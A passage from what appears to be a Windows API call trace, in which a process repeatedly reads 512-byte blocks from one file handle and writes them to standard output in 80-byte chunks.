hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType 